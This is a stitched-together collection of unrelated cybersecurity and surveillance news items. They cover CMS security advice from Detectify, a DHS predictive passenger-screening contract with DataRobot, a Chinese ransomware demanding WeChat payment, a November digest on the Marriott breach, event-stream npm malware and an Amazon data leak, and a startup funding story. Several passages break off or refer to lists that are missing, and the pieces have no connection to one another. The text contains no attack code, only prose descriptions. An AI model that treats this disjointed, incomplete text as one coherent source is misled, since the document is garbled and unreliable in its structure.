Affected users should consider using these experts’ tips to protect their accounts with a strong, unique password. If they used their potentially compromised password with any of their other web accounts, they should change those combinations as soon as possible. A password manager can (Read more...)

Any developer would probably agree Content Management Systems (CMS) make it easier for web development teams and marketing to work together. However CMS assets like blog.company.com are also web application based and could be targets of hacker attacks. Why’s that? Simply because they are based on commonly used technologies, communicate with end users, bring in organic or paid reader traffic and build brand awareness. Many companies spend resources on securing their main applications and neglect to also audit the security of the CMS platform because who would want to hack a blog ? More often than not it is more about the technology than content itself that’s interesting to hack, which is why CMS security needs attention as well. Here is our overview including expert advice from our security team:

Once you’ve decided to go with a CMS you’ll have to decide which vendor to go with and part of that is if it will be closed- or open-sourced. Cost and usability are key factors in the decision, but it’s also important to keep in mind the security maintenance expected to keep it up and running.

Using an open-source program means that anyone can access the source code and there is freedom to make changes to the source code and customize it for your website needs. A lot of eyes on the code also means there are people out there interested in testing and breaking the code, especially in widely used platforms. There are people out there testing the security of closed-source CMSes but it’s not at the same rate since they are only available with purchase; however, such platforms have internal security teams doing the testing and making fixes to keep up security. We receive vulnerability submissions for both closed- and open-sourced platforms from our Detectify Crowdsource community of 150+ handpicked white hat hackers. Crowdsource community manager Kristian Bremberg reviews many of these submissions, and contrasts the two: “Open source lets anyone look at the code, and therefore increases the chances of finding vulnerabilities. However, there’s no guarantee that the code will be reviewed by independent security researchers. Closed-source software is often owned by a company which spends money on internal code review and security testing.”

There’s a lot you can do to make sure security risks are alleviated when it comes to maintaining a CMS tool. We previously shared best practices on securing the Magento CMS application , and these same practices can be applied to any other CMS option too. Exploitation can be done through the hosting service, blog themes, plugins or extensions or user management, and it seems like a no-brainer to use the mentioned best practices:

In addition to the mentioned measures, it’s also imperative to ensure the plugins added to your CMS application are also secure to use. If you don’t use it, then uninstall it so it doesn’t become a security risk. Many plugins are hobby projects that are only updated once in while which means they can become vulnerable without the owners notice, and for that reason we recommend running automated scans that cover plugins. We often receive submissions for CMS plugins and it is something we are continuously open to receive from our Detectify Crowdsource white hat hackers. Scan your CMS platforms for common vulnerabilities

It’s common for Content Management Systems to be hosted on a platform that’s different from the main web application. For example, blog.company.com may be hosted on a CMS like WordPress which is not regularly monitored by a web development team and the code may not always be reviewed after updates or adding features. By using a tool likeDetectify to check a CMS for vulnerabilities, a findings report will show any vulnerabilities that may exist in the web application and with remediation tips. A code-savvy marketer could try to then fix the issue on their own or share it with a web developer or agency for the issue to be resolved.

Image: Detectify co-founder and top-ranked ethical hacker, Fredrik Nordberg Almroth, has legally hacked many tech giants including Google and Dropbox.

You’re rarely allowed to know exactly what’s keeping you safe. When you fly, you’re subject to secret rules , secretwatchlists, hidden cameras, and other trappings of a plump, thriving surveillance culture. The Department of Homeland Security is now complicating the picture further by paying a private Virginia firm to build a software algorithm with the power to flag you as someone who might try to blow up the plane.

The contract also stipulates that the software’s predictions must be able to function “solely” using data gleaned from ticket records and demographics ― criteria like origin airport, name, birthday, gender, and citizenship. The software canalso drawfrom slightly more complex inputs, like the name of the associated travel agent, seat number, credit card information, and broader travel itinerary. The overview document describes a situation in which the software could “predict if a passenger or a group of passengers is intended to join the terrorist groups overseas, by looking at age, domestic address, destination and/or transit airports, route information (one-way or round trip), duration of the stay, and luggage information, etc., and comparing with known instances.”

DataRobot’s bread and butter is turning vast troves of raw data, which all modern businesses accumulate, into predictions of future action, which all modern companies desire. Its clients include Monsanto and the CIA’s venture capital arm, In-Q-Tel. But not all of DataRobot’s clients are looking to pad their revenues; DHS plans to integrate the code into an existing DHS offering called the Global Travel Assessment System, or GTAS, a toolchain that has been released as open source software and which is designed to make it easy for other countries to quickly implement no-fly lists like those used by the U.S.

According to the technical overview, DHS’s predictive software contract would “complement the GTAS rule engine and watch list matching features with predictive models to enhance identification of high risk passengers.” In other words, the government has decided that it’s time for the world to move beyond simply putting names on a list of bad people and then checking passengers against that list. After all, an advanced computer program can identify risky fliers faster than humans could ever dream of and can also operate around the clock, requiring nothing more than electricity. The extent to which GTAS is monitored by humans is unclear. The overview document implies a degree of autonomy, listing as a requirement that the software should “automatically augment Watch List data with confirmed ‘positive’ high risk passengers.”

The document does make repeated references to “targeting analysts” reviewing what the system spits out, but the underlying data-crunching appears to be almost entirely the purview of software, and it’s unknown what ability said analysts would have to check or challenge these predictions. In an email to The Intercept, Daniel Kahn Gillmor, a senior technologist with the American Civil Liberties Union, expressed concern with this lack of human touch: “Aside from the software developers and system administrators themselves (which no one yet knows how to automate away), the things that GTAS aims to do look like they could be run mostly ‘on autopilot’ if the purchasers/deployers choose to operate it in that manner.” But Gillmor cautioned that evenincluding a humanin the loop could be a red herring when it comes to accountability: “Even if such a high-quality human oversight scheme were in place by design in the GTAS software and contributed modules (I see no indication that it is), it’s free software, so such a constraint could be removed. Countries where labor is expensive (or controversial, or potentially corrupt, etc) might be tempted to simply edit out any requirement for human intervention before deployment.”

“Countries where labor is expensive might be tempted to simply edit out any requirement for human intervention.”

For the surveillance-averse, consider the following: Would you rather a group of government administrators,who meet in secret and are exempt from disclosure, decide who is unfit to fly? Or would it be better for a computer, accountable only to its own code, to make that call? It’s hard to feel comfortable with the very concept of profiling, a practice that so easily collapses into prejudice rather than vigilance. But at least with uniformed government employees doing the eyeballing, we know who to blame when, say, a woman in a headscarf is needlessly hassled, or a man with dark skin is pulled aside for an extra pat-down.

If you ask DHS, this is a categorical win-win for all parties involved. Foreign governments are able to enjoy a higher standard of security screening; the United States gains some measure of confidence about the millions of foreigners who enter the country each year; and passengers can drink their complimentary beverage knowing that the person next to them wasn’t flagged as a terrorist by DataRobot’s algorithm. But watchlists, among the most notorious features of post-9/11 national security mania, are of questionable efficacy and dubious legality. A 2014 report by The Interceptpegged the U.S. Terrorist Screening Database, an FBI data set from which the no-fly list is excerpted, at roughly 680,000 entries, including some 280,000 individuals with “no recognized terrorist group affiliation.” That same year, a U.S. district court judge ruled in favor of an ACLU lawsuit, declaring theno-flylist unconstitutional. The list could only be used again if the government improved the mechanism through which people could challenge their inclusion on it ― a process that, at the very least, involved human government employees, convening and deliberating in secret.

Diagram from a Department of Homeland Security technical document illustrating how GTAS might visualize a potential terrorist onboard during the screening process.

Document: DHS

But what if you’re one of the inevitable false positives? Machine learning and behavioral prediction is already widespread; The Interceptreported earlier this year that Facebook is selling advertisers on its ability to forecast and pre-empt your actions. The consequences of botching consumer surveillance are generally pretty low: If a marketing algorithm mistakenly predicts your interest in fly fishing where there is none, the false positive is an annoying waste of time. The stakes at the airport are orders of magnitude higher.

12月1日，一家名为火绒安全的终端安全技术公司发文称，团队分析确认该病毒（Ransom/Bcrypt）为新型“勒索病毒”，入侵电脑运行后，会加密用户文件，但不收取比特币，而是要求受害者扫描弹出的微信二维码支付110元赎金，这也是国内首次出现要求微信支付赎金的“勒索病毒”。

据火绒安全统计，截止到12月3日，已有超过两万用户感染该病毒，并且被感染电脑数量还在增长。

12月4日，微信与支付宝两大平台作出回应。

微信回应称，已第一时间对所涉勒索病毒作者账户进行封禁，对收款二维码予以紧急冻结。

支付宝安全中心也表示，已第一时间跟进，目前没有一例支付宝账户受到影响，即便密码泄露也能最大程度的确保账户安全。

此次的勒索病毒危害到底有多大，用户的中招率几何？

网络安全专家李铁军向澎湃新闻（www.thepaper.cn）表示，这波“勒索病毒”的加密技术容易破解，上周六晚上就被发现了，各家安全厂商也做了即时清理。

李铁军说，该病毒只感染PC端，不涉及手机的移动支付，即使文件被加密了利用安全软件就能恢复。所以，普通用户不必过于担心，电脑上的杀毒软件升级后就可将病毒拦截。

而对于超过两万用户感染该病毒的说法，李铁军透露，其实该病毒感染的电脑，以黑灰产业从业者居多，他解释称，这类人主要是从事制作、传播病毒、参与刷单刷量业务，所用的软件经常被安全软件报毒，他们已经习惯了无视安全软件的报警。而普通用户的电脑上都安装了杀毒软件，只要杀毒软件报警把病毒清除即可。

此外，他还表示，这次的“勒索病毒”还会感染“易语言”这个 开发 工具的部分组件，之后，在染毒电脑开发的软件就被植入有害代码。易语言开发的软件，常在黑灰产业人群中使用，其他人群相对较少使用。

So much is going on every month in the world of cybersecurity, online privacy, and data protection. It’s difficult to keep up!

Our monthly security digest will help you keep tabs on the most important security and privacy news every month. Here’s what happened in November.

As ever, one of the biggest bits of security news hits at the end of the month.

November ended with the Marriott International hotel group revealing an enormous data breach. It is thought up to 500 million customer records are affected as the attacker had access to the Marriott International Starwood division network since 2014.

Marriott International acquired Starwood in 2016 to create the largest hotel chain in the world, with over 5,800 properties.

The leak means different things for different users. However, the information for each user contains a combination of:

Perhaps of most importance is Marriott’s revelation that some records included encrypted card information―but also could not rule out that the private keys had been stolen, too.

The long and the short of it is this: if you stayed at any Marriott Starwood hotel, including timeshare properties, before September 10, 2018, your information might have been compromised.

Marriott is taking measures to protect potentially affected user’s by offering a year’s free subscription to WebWatcher. US citizens will also receive a free fraud consultation and reimbursement coverage for free. At the current time, there are three enrollment sites:

Otherwise, check out these three simple ways to protect your data How to Counter Data Breaches: 3 Simple Ways to Protect Your Data How to Counter Data Breaches: 3 Simple Ways to Protect Your Data Data breaches don't only hit share prices and government department budgets. What should you do when news of a breach strikes? Read More after a major breach.

A JavaScript library that receives over 2 million downloads per week was injected with malicious code designed to steal cryptocurrencies.

The Event-Stream repository, a JavaScript package that simplifies working with Node.js streaming modules, was found to contain obfuscated code. When researchers deobfuscated the code, it became clear that its goal was bitcoin theft.

Analysis suggests the code targets libraries associated with the Copay bitcoin wallet for mobile and desktop. If the Copay wallet is present on a system, the malicious code attempts to steal the wallet contents. It then attempts to connect to a Malaysian IP address.

The malicious code was uploaded to the Event-Stream repository after the original developer, Dominic Tarr, handed control of the library to another developer, right9ctrl.

Right9ctrl uploaded a new version of the library almost as soon as control was handed over, the new version containing the malicious code targeting Copay wallets.

However, since that time, right9ctrl has uploaded another new version of the library―without any malicious code. The new upload also coincides with Copay updating their mobile and desktop wallet packages to remove the use of the JavaScript libraries targeted by the malicious code.

Just days before the biggest shopping day of the year (bar China’s Single’s Day, of course), Amazon suffered a data breach.

It is difficult to gauge the exact details of the breach because, well, Amazon isn’t telling. However, Amazon users in the U.K., U.S., South Korea, and the Netherlands all reported receiving an Amazon email regarding the breach, so it was a fairly global issue.

Users can take some consolation in that it was an Amazon technical issue leading to the data breach, rather than an attack on Amazon. The release of information doesn’t contain any banking information, either.

However, Amazon’s message that there is no need for affected users to change their password is plain wrong. If you have been affected by the Amazon data breach, change your account password.

Security researchers uncovered multiple critical vulnerabilities in Samsung and Crucial self-encrypting SSDs. The research team tested three Crucial SSDs and four Samsung SSDs, finding critical issues with each model tested.

There is a variety of issues:

Disconcertingly, the researchers stated that these vulnerabilities might very well apply to other models as well as different SSD manufacturers.

Chip vulnerabilities and supply-chain concerns have directed fresh eyes at the critical issues around hardware security, and a Portland-area startup just raised $8.75 million in new funding from Madrona Venture Group to help big targets protect themselves from novel threats.

Eclypsium’s new funding comes after an earlier seed round of $2.3 million from Andreessen Horowitz, Intel Capital, and Ubiquity Ventures, all of which participated again in the Madrona-led Series A round. Tim Porter of Madrona will join the board of Eclypsium, which is headquartered just across the southwest Portland border in Beaverton, Ore.

Co-founders Yuriy Bulygin and Alex Bazhaniuk, CEO and CTO respectively, are developing security services that can help cloud infrastructure providers, large financial services firms with significant investments in their own data centers, and government organizations detect, analyze, and prevent security threats at the firmware level. Firmware is the basic software that runs on specialized chips within a larger system, and acts as a crucial link between application software and things like graphics chips in a laptop or high-end hard drives in a server.

Enterprise companies have spent untold billions on software security over the last 20 years, but it’s starting to become clear that malicious attackers are probing hardware for flaws they can exploit . While nearly everyone in cloud and enterprise tech I’ve talked to about Bloomberg’s Supermicro hardware spy chip story has rolled their eyes, there’s also widespread agreement that firmware is vulnerable to bad actors working inside manufacturing facilities or remotely.

Eclypsium’s services are designed to analyze traffic at the firmware level on new or existing hardware within a company’s network and look for anomalies that could indicate something has been changed when compared to verified firmware. Given the central role firmware plays in the operation of the hardware, compromised firmware could open up huge security holes: it is a “huge attack surface that is almost never patched,” Bulygin said in an interview with GeekWire.

During Amazon Web Services’ re:Invent 2018 last week, AWS Chief Information Security Officer Stephen Schmidt shared that for many years AWS has actually replaced the firmware on incoming equipment with its own verified firmware, in what was originally designed as a way to reduce bugs. Most companies can’t afford to operate at that scale, however, which is where services like Eclypsium could help detect problems with stock firmware.

“We’re definitely seeing the shift in the mindset that it’s not just about the software security anymore,” Bulygin said.

The company has around 25 employees as of this latest round, and expects to expand to as many as 40 by the end of next year, Bulygin said. Right now the company has customers in the infrastructure-as-a-service market, financial services industry, and the government but he declined to share specific names.